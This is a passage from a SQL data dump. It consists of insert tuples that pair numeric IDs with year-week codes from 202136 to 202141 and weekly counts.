,'202136',4),(2993,1,'202136',4),(3004,1,'202136',4),(3096,1,'202136',4),(3104,1,'202136',4),(3247,1,'202136',4),(3261,1,'202136',4),(3271,1,'202136',4),(3275,1,'202136',4),(3278,1,'202136',4),(3280,1,'202136',4),(3290,1,'202136',4),(3297,1,'202136',4),(3438,1,'202136',4),(3489,1,'202136',4),(3534,1,'202136',4),(3714,1,'202136',4),(102,1,'202136',5),(484,1,'202136',5),(486,1,'202136',5),(1612,1,'202136',5),(1726,1,'202136',5),(1730,1,'202136',5),(1732,1,'202136',5),(1741,1,'202136',5),(1768,1,'202136',5),(2063,1,'202136',5),(2148,1,'202136',5),(2150,1,'202136',5),(2152,1,'202136',5),(2154,1,'202136',5),(2178,1,'202136',5),(2248,1,'202136',5),(2704,1,'202136',5),(2751,1,'202136',5),(2775,1,'202136',5),(2956,1,'202136',5),(2964,1,'202136',5),(2965,1,'202136',5),(3038,1,'202136',5),(3090,1,'202136',5),(3109,1,'202136',5),(3245,1,'202136',5),(3249,1,'202136',5),(3257,1,'202136',5),(3259,1,'202136',5),(3263,1,'202136',5),(3486,1,'202136',5),(3727,1,'202136',5),(3731,1,'202136',5),(3735,1,'202136',5),(3738,1,'202136',5),(3777,1,'202136',5),(467,1,'202136',6),(473,1,'202136',6),(478,1,'202136',6),(485,1,'202136',6),(1701,1,'202136',6),(1707,1,'202136',6),(1715,1,'202136',6),(1734,1,'202136',6),(1745,1,'202136',6),(1747,1,'202136',6),(1770,1,'202136',6),(1772,1,'202136',6),(1778,1,'202136',6),(2161,1,'202136',6),(2165,1,'202136',6),(2293,1,'202136',6),(2617,1,'202136',6),(3006,1,'202136',6),(3023,1,'202136',6),(3027,1,'202136',6),(3034,1,'202136',6),(3066,1,'202136',6),(3124,1,'202136',6),(3226,1,'202136',6),(3229,1,'202136',6),(3240,1,'202136',6),(3282,1,'202136',6),(3479,1,'202136',6),(3721,1,'202136',6),(3746,1,'202136',6),(110,1,'202136',7),(470,1,'202136',7),(483,1,'202136',7),(487,1,'202136',7),(1584,1,'202136',7),(1590,1,'202136',7),(1703,1,'202136',7),(2297,1,'202136',7),(2457,1,'202136',7),(2609,1,'202136',7),(2769,1,'202136',7),(2809,1,'202136',7),(3079,1,'202136',7),(3710,1,'202136',7),(3742,1,'202136',7),(3771,1,'202136',7),(1610,1,'202136',8),(1614,1,'202136',8),(1711,1,'202136',8),(1774,1,'202136',8),(2989,1,'202136',8),(3041,1,'202136',8),(3072,1,'202136',8),(3117,1,'202136',8),(3127,1,'202136',8),(3285,1,'202136',8),(3287,1,'202136',8),(3307,1,'202136',8),(3313,1,'202136',8),(3316,1,'202136',8),(3541,1,'202136',8),(3752,1,'202136',8),(469,1,'202136',9),(477,1,'202136',9),(2911,1,'202136',9),(3102,1,'202136',9),(468,1,'202136',10),(472,1,'202136',10),(488,1,'202136',10),(1739,1,'202136',10),(3060,1,'202136',10),(3267,1,'202136',10),(2159,1,'202136',11),(2804,1,'202136',11),(3030,1,'202136',11),(74,1,'202136',12),(1592,1,'202136',12),(2296,1,'202136',12),(3774,1,'202136',12),(4275,1,'202136',12),(108,1,'202136',13),(1544,1,'202136',13),(1604,1,'202136',13),(1728,1,'202136',13),(335,1,'202136',14),(474,1,'202136',14),(3482,1,'202136',14),(1608,1,'202136',15),(1596,1,'202136',16),(3005,1,'202136',16),(3083,1,'202136',16),(3764,1,'202136',16),(1598,1,'202136',17),(2813,1,'202136',17),(1582,1,'202136',18),(1606,1,'202136',18),(1718,1,'202136',18),(3045,1,'202136',18),(1594,1,'202136',20),(1586,1,'202136',21),(2309,1,'202136',21),(76,1,'202136',22),(91,1,'202136',23),(1588,1,'202136',24),(1600,1,'202136',24),(3781,1,'202136',25),(72,1,'202136',27),(84,1,'202136',27),(68,1,'202136',28),(87,1,'202136',35),(89,1,'202136',47),(2503,1,'202136',49),(80,1,'202136',59),(1602,1,'202136',70),(2904,1,'202136',111),(9,1,'202136',810),(106,1,'202137',1),(110,1,'202137',1),(478,1,'202137',2),(1772,1,'202137',2),(3727,1,'202137',2),(3731,1,'202137',2),(479,1,'202137',3),(486,1,'202137',3),(1590,1,'202137',3),(1743,1,'202137',3),(1747,1,'202137',3),(2165,1,'202137',3),(2252,1,'202137',3),(2293,1,'202137',3),(2769,1,'202137',3),(3030,1,'202137',3),(3066,1,'202137',3),(3229,1,'202137',3),(3249,1,'202137',3),(3259,1,'202137',3),(3531,1,'202137',3),(3714,1,'202137',3),(3721,1,'202137',3),(3742,1,'202137',3),(471,1,'202137',4),(476,1,'202137',4),(482,1,'202137',4),(483,1,'202137',4),(1701,1,'202137',4),(1709,1,'202137',4),(1715,1,'202137',4),(1732,1,'202137',4),(1739,1,'202137',4),(1745,1,'202137',4),(1774,1,'202137',4),(1778,1,'202137',4),(1780,1,'202137',4),(2152,1,'202137',4),(2154,1,'202137',4),(2178,1,'202137',4),(2248,1,'202137',4),(2297,1,'202137',4),(2989,1,'202137',4),(3006,1,'202137',4),(3063,1,'202137',4),(3096,1,'202137',4),(3107,1,'202137',4),(3226,1,'202137',4),(3245,1,'202137',4),(3251,1,'202137',4),(3253,1,'202137',4),(3257,1,'202137',4),(3265,1,'202137',4),(3275,1,'202137',4),(3280,1,'202137',4),(3307,1,'202137',4),(3430,1,'202137',4),(3486,1,'202137',4),(3710,1,'202137',4),(3738,1,'202137',4),(3749,1,'202137',4),(74,1,'202137',5),(102,1,'202137',5),(467,1,'202137',5),(469,1,'202137',5),(481,1,'202137',5),(570,1,'202137',5),(1695,1,'202137',5),(1703,1,'202137',5),(1707,1,'202137',5),(1711,1,'202137',5),(1730,1,'202137',5),(1751,1,'202137',5),(1782,1,'202137',5),(2150,1,'202137',5),(2156,1,'202137',5),(2748,1,'202137',5),(2775,1,'202137',5),(2956,1,'202137',5),(2964,1,'202137',5),(2993,1,'202137',5),(3027,1,'202137',5),(3079,1,'202137',5),(3092,1,'202137',5),(3097,1,'202137',5),(3104,1,'202137',5),(3109,1,'202137',5),(3124,1,'202137',5),(3240,1,'202137',5),(3247,1,'202137',5),(3267,1,'202137',5),(3278,1,'202137',5),(3285,1,'202137',5),(3313,1,'202137',5),(3482,1,'202137',5),(3489,1,'202137',5),(3541,1,'202137',5),(477,1,'202137',6),(480,1,'202137',6),(484,1,'202137',6),(1697,1,'202137',6),(1713,1,'202137',6),(1726,1,'202137',6),(1766,1,'202137',6),(1776,1,'202137',6),(2063,1,'202137',6),(2161,1,'202137',6),(2658,1,'202137',6),(2804,1,'202137',6),(2911,1,'202137',6),(2965,1,'202137',6),(3023,1,'202137',6),(3041,1,'202137',6),(3072,1,'202137',6),(3087,1,'202137',6),(3261,1,'202137',6),(3263,1,'202137',6),(3269,1,'202137',6),(3273,1,'202137',6),(3297,1,'202137',6),(3498,1,'202137',6),(3534,1,'202137',6),(3724,1,'202137',6),(3735,1,'202137',6),(3777,1,'202137',6),(473,1,'202137',7),(487,1,'202137',7),(1699,1,'202137',7),(1720,1,'202137',7),(1722,1,'202137',7),(1734,1,'202137',7),(1737,1,'202137',7),(1749,1,'202137',7),(1768,1,'202137',7),(1770,1,'202137',7),(2148,1,'202137',7),(2617,1,'202137',7),(2751,1,'202137',7),(2991,1,'202137',7),(3090,1,'202137',7),(3243,1,'202137',7),(3282,1,'202137',7),(3290,1,'202137',7),(3438,1,'202137',7),(3771,1,'202137',7),(3774,1,'202137',7),(474,1,'202137',8),(485,1,'202137',8),(1741,1,'202137',8),(2558,1,'202137',8),(2609,1,'202137',8),(3004,1,'202137',8),(3005,1,'202137',8),(3034,1,'202137',8),(3117,1,'202137',8),(3271,1,'202137',8),(3287,1,'202137',8),(3479,1,'202137',8),(3746,1,'202137',8),(4275,1,'202137',8),(488,1,'202137',9),(1584,1,'202137',9),(1705,1,'202137',9),(1728,1,'202137',9),(2159,1,'202137',9),(2801,1,'202137',9),(3038,1,'202137',9),(3045,1,'202137',9),(3316,1,'202137',9),(4301,1,'202137',9),(470,1,'202137',10),(472,1,'202137',10),(1592,1,'202137',10),(1610,1,'202137',10),(468,1,'202137',11),(1724,1,'202137',11),(3102,1,'202137',11),(3752,1,'202137',11),(84,1,'202137',12),(1594,1,'202137',12),(1604,1,'202137',12),(2457,1,'202137',12),(2704,1,'202137',12),(2809,1,'202137',12),(3060,1,'202137',12),(3069,1,'202137',12),(3127,1,'202137',12),(1608,1,'202137',13),(1614,1,'202137',13),(3781,1,'202137',13),(91,1,'202137',14),(1544,1,'202137',14),(2296,1,'202137',14),(3764,1,'202137',14),(72,1,'202137',15),(1582,1,'202137',15),(1612,1,'202137',15),(2309,1,'202137',15),(76,1,'202137',16),(108,1,'202137',16),(1600,1,'202137',17),(1718,1,'202137',18),(335,1,'202137',20),(1596,1,'202137',20),(1606,1,'202137',20),(1598,1,'202137',21),(2813,1,'202137',22),(87,1,'202137',24),(68,1,'202137',25),(1588,1,'202137',28),(2503,1,'202137',28),(1586,1,'202137',29),(3083,1,'202137',29),(89,1,'202137',36),(1602,1,'202137',37),(80,1,'202137',57),(2904,1,'202137',88),(9,1,'202137',669),(106,1,'202138',1),(110,1,'202138',1),(1711,1,'202138',1),(2293,1,'202138',1),(3124,1,'202138',1),(481,1,'202138',2),(1695,1,'202138',2),(1701,1,'202138',2),(1720,1,'202138',2),(1722,1,'202138',2),(1768,1,'202138',2),(1772,1,'202138',2),(2063,1,'202138',2),(2178,1,'202138',2),(2558,1,'202138',2),(2965,1,'202138',2),(2993,1,'202138',2),(3079,1,'202138',2),(3251,1,'202138',2),(3534,1,'202138',2),(3727,1,'202138',2),(3731,1,'202138',2),(3752,1,'202138',2),(102,1,'202138',3),(483,1,'202138',3),(1590,1,'202138',3),(1705,1,'202138',3),(1707,1,'202138',3),(1709,1,'202138',3),(1715,1,'202138',3),(1734,1,'202138',3),(1751,1,'202138',3),(1770,1,'202138',3),(1782,1,'202138',3),(2152,1,'202138',3),(2156,1,'202138',3),(2248,1,'202138',3),(2748,1,'202138',3),(3072,1,'202138',3),(3097,1,'202138',3),(3109,1,'202138',3),(3240,1,'202138',3),(3253,1,'202138',3),(3265,1,'202138',3),(3273,1,'202138',3),(3297,1,'202138',3),(3316,1,'202138',3),(3721,1,'202138',3),(3735,1,'202138',3),(3738,1,'202138',3),(3746,1,'202138',3),(3771,1,'202138',3),(4387,1,'202138',3),(476,1,'202138',4),(480,1,'202138',4),(482,1,'202138',4),(485,1,'202138',4),(1604,1,'202138',4),(1610,1,'202138',4),(1697,1,'202138',4),(1699,1,'202138',4),(1703,1,'202138',4),(1713,1,'202138',4),(1724,1,'202138',4),(1730,1,'202138',4),(1732,1,'202138',4),(1737,1,'202138',4),(1747,1,'202138',4),(1749,1,'202138',4),(1766,1,'202138',4),(1774,1,'202138',4),(2658,1,'202138',4),(2956,1,'202138',4),(2991,1,'202138',4),(3004,1,'202138',4),(3066,1,'202138',4),(3087,1,'202138',4),(3092,1,'202138',4),(3096,1,'202138',4),(3107,1,'202138',4),(3226,1,'202138',4),(3243,1,'202138',4),(3247,1,'202138',4),(3249,1,'202138',4),(3259,1,'202138',4),(3261,1,'202138',4),(3267,1,'202138',4),(3271,1,'202138',4),(3285,1,'202138',4),(3290,1,'202138',4),(3479,1,'202138',4),(3482,1,'202138',4),(3498,1,'202138',4),(3531,1,'202138',4),(3714,1,'202138',4),(4377,1,'202138',4),(74,1,'202138',5),(478,1,'202138',5),(484,1,'202138',5),(488,1,'202138',5),(1584,1,'202138',5),(1778,1,'202138',5),(2148,1,'202138',5),(2161,1,'202138',5),(2252,1,'202138',5),(2296,1,'202138',5),(2751,1,'202138',5),(2801,1,'202138',5),(2911,1,'202138',5),(2989,1,'202138',5),(3038,1,'202138',5),(3041,1,'202138',5),(3090,1,'202138',5),(3229,1,'202138',5),(3257,1,'202138',5),(3269,1,'202138',5),(3278,1,'202138',5),(3280,1,'202138',5),(3430,1,'202138',5),(3438,1,'202138',5),(3541,1,'202138',5),(4357,1,'202138',5),(4363,1,'202138',5),(4373,1,'202138',5),(4382,1,'202138',5),(4391,1,'202138',5),(468,1,'202138',6),(470,1,'202138',6),(477,1,'202138',6),(479,1,'202138',6),(570,1,'202138',6),(1544,1,'202138',6),(1612,1,'202138',6),(1743,1,'202138',6),(1745,1,'202138',6),(2150,1,'202138',6),(2704,1,'202138',6),(2964,1,'202138',6),(3006,1,'202138',6),(3104,1,'202138',6),(3127,1,'202138',6),(3263,1,'202138',6),(3282,1,'202138',6),(3287,1,'202138',6),(3307,1,'202138',6),(3313,1,'202138',6),(3489,1,'202138',6),(3749,1,'202138',6),(3774,1,'202138',6),(4238,1,'202138',6),(4301,1,'202138',6),(4368,1,'202138',6),(4396,1,'202138',6),(467,1,'202138',7),(469,1,'202138',7),(1614,1,'202138',7),(1776,1,'202138',7),(2809,1,'202138',7),(3034,1,'202138',7),(3060,1,'202138',7),(3245,1,'202138',7),(3275,1,'202138',7),(3486,1,'202138',7),(1741,1,'202138',8),(1780,1,'202138',8),(2154,1,'202138',8),(2617,1,'202138',8),(3005,1,'202138',8),(3063,1,'202138',8),(3069,1,'202138',8),(3117,1,'202138',8),(3777,1,'202138',8),(4326,1,'202138',8),(473,1,'202138',9),(2159,1,'202138',9),(2297,1,'202138',9),(2804,1,'202138',9),(3023,1,'202138',9),(3027,1,'202138',9),(3045,1,'202138',9),(3742,1,'202138',9),(4323,1,'202138',9),(4329,1,'202138',9),(486,1,'202138',10),(487,1,'202138',10),(1592,1,'202138',10),(1606,1,'202138',10),(1608,1,'202138',10),(4338,1,'202138',10),(472,1,'202138',11),(474,1,'202138',11),(1739,1,'202138',11),(2775,1,'202138',11),(3102,1,'202138',11),(4341,1,'202138',11),(1718,1,'202138',12),(3724,1,'202138',12),(4275,1,'202138',12),(1726,1,'202138',13),(2457,1,'202138',13),(4332,1,'202138',13),(4335,1,'202138',13),(2165,1,'202138',14),(2769,1,'202138',14),(1596,1,'202138',15),(1728,1,'202138',15),(2309,1,'202138',15),(2609,1,'202138',15),(2813,1,'202138',15),(3710,1,'202138',15),(3764,1,'202138',15),(108,1,'202138',16),(335,1,'202138',16),(471,1,'202138',16),(3030,1,'202138',16),(76,1,'202138',19),(84,1,'202138',19),(1600,1,'202138',19),(1582,1,'202138',20),(1598,1,'202138',20),(3781,1,'202138',21),(1594,1,'202138',22),(89,1,'202138',24),(91,1,'202138',24),(2503,1,'202138',25),(68,1,'202138',28),(1588,1,'202138',28),(87,1,'202138',29),(1586,1,'202138',29),(3083,1,'202138',33),(72,1,'202138',45),(80,1,'202138',50),(1602,1,'202138',51),(2904,1,'202138',138),(9,1,'202138',712),(106,1,'202139',1),(2293,1,'202139',1),(110,1,'202139',2),(1772,1,'202139',2),(3486,1,'202139',2),(3489,1,'202139',2),(3724,1,'202139',2),(474,1,'202139',3),(476,1,'202139',3),(481,1,'202139',3),(1699,1,'202139',3),(1707,1,'202139',3),(1709,1,'202139',3),(1713,1,'202139',3),(1734,1,'202139',3),(1739,1,'202139',3),(1745,1,'202139',3),(1782,1,'202139',3),(2152,1,'202139',3),(2154,1,'202139',3),(2751,1,'202139',3),(2775,1,'202139',3),(2956,1,'202139',3),(3023,1,'202139',3),(3096,1,'202139',3),(3229,1,'202139',3),(3257,1,'202139',3),(3259,1,'202139',3),(3263,1,'202139',3),(3438,1,'202139',3),(3479,1,'202139',3),(3721,1,'202139',3),(3738,1,'202139',3),(4323,1,'202139',3),(4412,1,'202139',3),(4428,1,'202139',3),(4448,1,'202139',3),(479,1,'202139',4),(480,1,'202139',4),(486,1,'202139',4),(1697,1,'202139',4),(1703,1,'202139',4),(1705,1,'202139',4),(1730,1,'202139',4),(1743,1,'202139',4),(1774,1,'202139',4),(1780,1,'202139',4),(2161,1,'202139',4),(2252,1,'202139',4),(2801,1,'202139',4),(2804,1,'202139',4),(3072,1,'202139',4),(3097,1,'202139',4),(3104,1,'202139',4),(3109,1,'202139',4),(3124,1,'202139',4),(3240,1,'202139',4),(3243,1,'202139',4),(3249,1,'202139',4),(3287,1,'202139',4),(3307,1,'202139',4),(3531,1,'202139',4),(3534,1,'202139',4),(3727,1,'202139',4),(3731,1,'202139',4),(3749,1,'202139',4),(4238,1,'202139',4),(4368,1,'202139',4),(4377,1,'202139',4),(4387,1,'202139',4),(4404,1,'202139',4),(4416,1,'202139',4),(4424,1,'202139',4),(4432,1,'202139',4),(4436,1,'202139',4),(4440,1,'202139',4),(4444,1,'202139',4),(484,1,'202139',5),(1711,1,'202139',5),(1737,1,'202139',5),(1741,1,'202139',5),(1751,1,'202139',5),(1766,1,'202139',5),(1768,1,'202139',5),(2150,1,'202139',5),(2156,1,'202139',5),(2178,1,'202139',5),(2296,1,'202139',5),(2297,1,'202139',5),(2748,1,'202139',5),(2813,1,'202139',5),(2991,1,'202139',5),(2993,1,'202139',5),(3027,1,'202139',5),(3041,1,'202139',5),(3066,1,'202139',5),(3107,1,'202139',5),(3251,1,'202139',5),(3253,1,'202139',5),(3267,1,'202139',5),(3271,1,'202139',5),(3275,1,'202139',5),(3278,1,'202139',5),(3280,1,'202139',5),(3285,1,'202139',5),(3297,1,'202139',5),(3541,1,'202139',5),(3714,1,'202139',5),(3752,1,'202139',5),(4275,1,'202139',5),(4329,1,'202139',5),(4357,1,'202139',5),(4363,1,'202139',5),(4382,1,'202139',5),(4408,1,'202139',5),(473,1,'202139',6),(477,1,'202139',6),(483,1,'202139',6),(488,1,'202139',6),(1612,1,'202139',6),(1701,1,'202139',6),(1722,1,'202139',6),(1726,1,'202139',6),(1732,1,'202139',6),(1747,1,'202139',6),(1749,1,'202139',6),(2063,1,'202139',6),(2248,1,'202139',6),(2558,1,'202139',6),(2965,1,'202139',6),(3034,1,'202139',6),(3038,1,'202139',6),(3045,1,'202139',6),(3079,1,'202139',6),(3090,1,'202139',6),(3117,1,'202139',6),(3226,1,'202139',6),(3247,1,'202139',6),(3273,1,'202139',6),(3282,1,'202139',6),(3430,1,'202139',6),(4301,1,'202139',6),(4326,1,'202139',6),(4373,1,'202139',6),(4391,1,'202139',6),(4396,1,'202139',6),(4420,1,'202139',6),(102,1,'202139',7),(468,1,'202139',7),(482,1,'202139',7),(485,1,'202139',7),(1590,1,'202139',7),(1715,1,'202139',7),(1720,1,'202139',7),(1724,1,'202139',7),(1770,1,'202139',7),(2165,1,'202139',7),(2658,1,'202139',7),(2704,1,'202139',7),(3030,1,'202139',7),(3063,1,'202139',7),(3092,1,'202139',7),(3102,1,'202139',7),(3127,1,'202139',7),(3245,1,'202139',7),(3269,1,'202139',7),(3313,1,'202139',7),(3316,1,'202139',7),(3482,1,'202139',7),(3498,1,'202139',7),(3746,1,'202139',7),(3774,1,'202139',7),(1544,1,'202139',8),(1584,1,'202139',8),(1604,1,'202139',8),(1695,1,'202139',8),(1728,1,'202139',8),(2911,1,'202139',8),(3005,1,'202139',8),(3069,1,'202139',8),(3087,1,'202139',8),(3710,1,'202139',8),(3735,1,'202139',8),(3771,1,'202139',8),(74,1,'202139',9),(335,1,'202139',9),(470,1,'202139',9),(472,1,'202139',9),(570,1,'202139',9),(1610,1,'202139',9),(1614,1,'202139',9),(1778,1,'202139',9),(2609,1,'202139',9),(2964,1,'202139',9),(2989,1,'202139',9),(3006,1,'202139',9),(3261,1,'202139',9),(3742,1,'202139',9),(4338,1,'202139',9),(469,1,'202139',10),(487,1,'202139',10),(1592,1,'202139',10),(1776,1,'202139',10),(2617,1,'202139',10),(2809,1,'202139',10),(3083,1,'202139',10),(3290,1,'202139',10),(3777,1,'202139',10),(2159,1,'202139',11),(3004,1,'202139',11),(3060,1,'202139',11),(3265,1,'202139',11),(467,1,'202139',12),(1718,1,'202139',12),(2457,1,'202139',12),(4332,1,'202139',12),(4335,1,'202139',12),(84,1,'202139',13),(1606,1,'202139',13),(108,1,'202139',14),(478,1,'202139',14),(1582,1,'202139',14),(1608,1,'202139',14),(87,1,'202139',15),(2148,1,'202139',15),(2769,1,'202139',15),(3764,1,'202139',15),(3781,1,'202139',15),(471,1,'202139',16),(68,1,'202139',17),(1598,1,'202139',17),(4341,1,'202139',17),(76,1,'202139',18),(1596,1,'202139',18),(1594,1,'202139',19),(1600,1,'202139',19),(89,1,'202139',20),(91,1,'202139',20),(2309,1,'202139',21),(1588,1,'202139',22),(2503,1,'202139',22),(72,1,'202139',28),(1602,1,'202139',28),(4400,1,'202139',28),(1586,1,'202139',29),(80,1,'202139',40),(2904,1,'202139',98),(9,1,'202139',653),(102,1,'202140',1),(482,1,'202140',1),(1722,1,'202140',1),(1724,1,'202140',1),(2156,1,'202140',1),(2293,1,'202140',1),(2296,1,'202140',1),(3034,1,'202140',1),(3240,1,'202140',1),(3269,1,'202140',1),(3271,1,'202140',1),(3282,1,'202140',1),(3287,1,'202140',1),(3541,1,'202140',1),(3727,1,'202140',1),(4326,1,'202140',1),(4444,1,'202140',1),(470,1,'202140',2),(479,1,'202140',2),(480,1,'202140',2),(1695,1,'202140',2),(1703,1,'202140',2),(1734,1,'202140',2),(1749,1,'202140',2),(2252,1,'202140',2),(2748,1,'202140',2),(2964,1,'202140',2),(2993,1,'202140',2),(3006,1,'202140',2),(3023,1,'202140',2),(3038,1,'202140',2),(3069,1,'202140',2),(3096,1,'202140',2),(3107,1,'202140',2),(3124,1,'202140',2),(3249,1,'202140',2),(3251,1,'202140',2),(3267,1,'202140',2),(3278,1,'202140',2),(3316,1,'202140',2),(3531,1,'202140',2),(3774,1,'202140',2),(4323,1,'202140',2),(4357,1,'202140',2),(4363,1,'202140',2),(4377,1,'202140',2),(4387,1,'202140',2),(4424,1,'202140',2),(4448,1,'202140',2),(106,1,'202140',3),(476,1,'202140',3),(481,1,'202140',3),(483,1,'202140',3),(488,1,'202140',3),(1701,1,'202140',3),(1705,1,'202140',3),(1713,1,'202140',3),(1726,1,'202140',3),(1739,1,'202140',3),(1743,1,'202140',3),(1766,1,'202140',3),(1768,1,'202140',3),(1770,1,'202140',3),(1780,1,'202140',3),(1782,1,'202140',3),(2152,1,'202140',3),(2161,1,'202140',3),(2178,1,'202140',3),(2558,1,'202140',3),(2658,1,'202140',3),(2956,1,'202140',3),(3027,1,'202140',3),(3079,1,'202140',3),(3090,1,'202140',3),(3092,1,'202140',3),(3097,1,'202140',3),(3102,1,'202140',3),(3104,1,'202140',3),(3226,1,'202140',3),(3257,1,'202140',3),(3259,1,'202140',3),(3261,1,'202140',3),(3280,1,'202140',3),(3297,1,'202140',3),(3486,1,'202140',3),(3721,1,'202140',3),(3724,1,'202140',3),(3731,1,'202140',3),(3735,1,'202140',3),(3749,1,'202140',3),(3752,1,'202140',3),(4329,1,'202140',3),(4373,1,'202140',3),(4382,1,'202140',3),(4391,1,'202140',3),(4408,1,'202140',3),(4428,1,'202140',3),(4432,1,'202140',3),(4436,1,'202140',3),(467,1,'202140',4),(477,1,'202140',4),(570,1,'202140',4),(1590,1,'202140',4),(1610,1,'202140',4),(1709,1,'202140',4),(1720,1,'202140',4),(1730,1,'202140',4),(1732,1,'202140',4),(1741,1,'202140',4),(1745,1,'202140',4),(1747,1,'202140',4),(1751,1,'202140',4),(1774,1,'202140',4),(2063,1,'202140',4),(2704,1,'202140',4),(2801,1,'202140',4),(2965,1,'202140',4),(3004,1,'202140',4),(3041,1,'202140',4),(3066,1,'202140',4),(3072,1,'202140',4),(3109,1,'202140',4),(3127,1,'202140',4),(3229,1,'202140',4),(3253,1,'202140',4),(3290,1,'202140',4),(3430,1,'202140',4),(3438,1,'202140',4),(3479,1,'202140',4),(3489,1,'202140',4),(3498,1,'202140',4),(3714,1,'202140',4),(4275,1,'202140',4),(4335,1,'202140',4),(4338,1,'202140',4),(4368,1,'202140',4),(4412,1,'202140',4),(4416,1,'202140',4),(4440,1,'202140',4),(74,1,'202140',5),(484,1,'202140',5),(485,1,'202140',5),(486,1,'202140',5),(1699,1,'202140',5),(1707,1,'202140',5),(1715,1,'202140',5),(1778,1,'202140',5),(2148,1,'202140',5),(2165,1,'202140',5),(2248,1,'202140',5),(2751,1,'202140',5),(3005,1,'202140',5),(3243,1,'202140',5),(3247,1,'202140',5),(3263,1,'202140',5),(3275,1,'202140',5),(3307,1,'202140',5),(4238,1,'202140',5),(4332,1,'202140',5),(4396,1,'202140',5),(4404,1,'202140',5),(4420,1,'202140',5),(468,1,'202140',6),(469,1,'202140',6),(471,1,'202140',6),(1606,1,'202140',6),(1697,1,'202140',6),(1772,1,'202140',6),(1776,1,'202140',6),(2150,1,'202140',6),(2775,1,'202140',6),(2813,1,'202140',6),(2989,1,'202140',6),(2991,1,'202140',6),(3087,1,'202140',6),(3482,1,'202140',6),(3738,1,'202140',6),(3777,1,'202140',6),(335,1,'202140',7),(472,1,'202140',7),(1711,1,'202140',7),(2617,1,'202140',7),(2804,1,'202140',7),(2911,1,'202140',7),(3045,1,'202140',7),(3313,1,'202140',7),(473,1,'202140',8),(1544,1,'202140',8),(1598,1,'202140',8),(1600,1,'202140',8),(1608,1,'202140',8),(1737,1,'202140',8),(2609,1,'202140',8),(3060,1,'202140',8),(3083,1,'202140',8),(3245,1,'202140',8),(3742,1,'202140',8),(3746,1,'202140',8),(3764,1,'202140',8),(4301,1,'202140',8),(76,1,'202140',9),(478,1,'202140',9),(1612,1,'202140',9),(2154,1,'202140',9),(2159,1,'202140',9),(3063,1,'202140',9),(3117,1,'202140',9),(3710,1,'202140',9),(3771,1,'202140',9),(108,1,'202140',10),(474,1,'202140',10),(1584,1,'202140',10),(1604,1,'202140',10),(1614,1,'202140',10),(1728,1,'202140',10),(1718,1,'202140',11),(2297,1,'202140',11),(2457,1,'202140',11),(4341,1,'202140',11),(1592,1,'202140',12),(2809,1,'202140',12),(84,1,'202140',13),(68,1,'202140',14),(4400,1,'202140',14),(1594,1,'202140',15),(1596,1,'202140',15),(3781,1,'202140',15),(87,1,'202140',16),(1582,1,'202140',16),(2769,1,'202140',16),(487,1,'202140',17),(89,1,'202140',18),(91,1,'202140',19),(2309,1,'202140',19),(2503,1,'202140',21),(3030,1,'202140',21),(1588,1,'202140',24),(72,1,'202140',28),(1586,1,'202140',29),(80,1,'202140',34),(1602,1,'202140',36),(2904,1,'202140',103),(9,1,'202140',805),(2178,1,'202141',2),(3109,1,'202141',2),(3249,1,'202141',2),(3738,1,'202141',2),(1715,1,'202141',3),(1737,1,'202141',3),(1751,1,'202141',3),(1772,1,'202141',3),(1774,1,'202141',3),(2063,1,'202141',3),(2248,1,'202141',3),(2965,1,'202141',3),(3079,1,'202141',3),(3096,1,'202141',3),(3107,1,'202141',3),(3240,1,'202141',3),(3243,1,'202141',3),(3253,1,'202141',3),(3259,1,'202141',3),(3287,1,'202141',3),(3297,1,'202141',3),(3541,1,'202141',3),(3727,1,'202141',3),(3731,1,'202141',3),(3735,1,'202141',3),(106,1,'202141',4),(110,1,'202141',4),(1590,1,'202141',4),(1610,1,'202141',4),(1697,1,'202141',4),(1699,1,'202141',4),(1720,1,'202141',4),(1732,1,'202141',4),(1743,1,'202141',4),(1776,1,'202141',4),(1778,1,'202141',4),(2150,1,'202141',4),(2156,1,'202141',4),(2252,1,'202141',4),(3066,1,'202141',4),(3087,1,'202141',4),(3226,1,'202141',4),(3265,1,'202141',4),(3438,1,'202141',4),(3531,1,'202141',4),(3724,1,'202141',4),(3749,1,'202141',4),(3752,1,'202141',4),(476,1,'202141',5),(479,1,'202141',5),(483,1,'202141',5),(570,1,'202141',5),(1701,1,'202141',5),(1703,1,'202141',5),(1705,1,'202141',5),(1707,1,'202141',5),(1709,1,'202141',5),(1711,1,'202141',5),(1724,1,'202141',5),(1739,1,'202141',5),(1745,1,'202141',5),(1768,1,'202141',5),(1770,1,'202141',5),(1780,1,'202141',5),(2152,1,'202141',5),(2154,1,'202141',5),(2161,1,'202141',5),(2293,1,'202141',5),(2558,1,'202141',5),(2617,1,'202141',5),(2748,1,'202141',5),(2991,1,'202141',5),(2993,1,'202141',5),(3090,1,'202141',5),(3104,1,'202141',5),(3229,1,'202141',5),(3247,1,'202141',5),(3257,1,'202141',5),(3263,1,'202141',5),(3267,1,'202141',5),(3269,1,'202141',5),(3313,1,'202141',5),(3534,1,'202141',5),(3774,1,'202141',5),(4301,1,'202141',5),(4357,1,'202141',5),(4363,1,'202141',5),(4387,1,'202141',5),(4391,1,'202141',5),(4428,1,'202141',5),(4448,1,'202141',5),(480,1,'202141',6),(1695,1,'202141',6),(1713,1,'202141',6),(1726,1,'202141',6),(1730,1,'202141',6),(1766,1,'202141',6),(2165,1,'202141',6),(2658,1,'202141',6),(2751,1,'202141',6),(2801,1,'202141',6),(2964,1,'202141',6),(3004,1,'202141',6),(3005,1,'202141',6),(3006,1,'202141',6),(3027,1,'202141',6),(3034,1,'202141',6),(3038,1,'202141',6),(3245,1,'202141',6),(3273,1,'202141',6),(3275,1,'202141',6),(3278,1,'202141',6),(3280,1,'202141',6),(3307,1,'202141',6),(3316,1,'202141',6),(3430,1,'202141',6),(3479,1,'202141',6),(3489,1,'202141',6),(3714,1,'202141',6),(3721,1,'202141',6),(4275,1,'202141',6),(4382,1,'202141',6),(4396,1,'202141',6),(4404,1,'202141',6),(4408,1,'202141',6),(4416,1,'202141',6),(4420,1,'202141',6),(4424,1,'202141',6),(4440,1,'202141',6),(102,1,'202141',7),(471,1,'202141',7),(478,1,'202141',7),(481,1,'202141',7),(482,1,'202141',7),(1722,1,'202141',7),(1741,1,'202141',7),(1747,1,'202141',7),(1749,1,'202141',7),(1782,1,'202141',7),(2148,1,'202141',7),(3041,1,'202141',7),(3072,1,'202141',7),(3097,1,'202141',7),(3102,1,'202141',7),(3261,1,'202141',7),(3271,1,'202141',7),(3482,1,'202141',7),(3486,1,'202141',7),(3710,1,'202141',7),(4323,1,'202141',7),(4329,1,'202141',7),(4373,1,'202141',7),(4412,1,'202141',7),(